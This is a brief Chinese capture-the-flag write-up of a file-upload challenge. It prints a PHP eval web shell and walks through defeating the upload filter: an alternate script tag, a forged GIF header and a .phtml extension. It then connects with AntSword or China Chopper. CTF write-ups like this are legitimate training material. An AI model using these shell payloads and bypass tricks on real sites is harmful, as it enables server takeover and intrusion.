打开题目后发现是一道上传题,如下。
随便上传个 .jpg
结尾的小马上去,提示:NO! HACKER! your file included '<?'
。
<?php
@eval($_POST['cmd']);
?>
因此使用其他方式替换掉 <?
。
<script language="php">@eval($_POST[cmd])</script>
替换掉后重新上传,提示:Don't lie to me, it's not image at all!!!
。
因此给上传的文件内容头加上图片文件的内容头,提示成功上传。
GIF9<script language="php">@eval($_POST[cmd])</script>
将文件名修改为 php.php
后重新上传,提示:NOT!php!
。
因此尝试将文件名修改为 php.phtml
后重新上传,成功上传。
通过猜测,确认上传后的文件在 /upload/
下,因此直接使用 Antsword
或中国菜刀即可连接小马。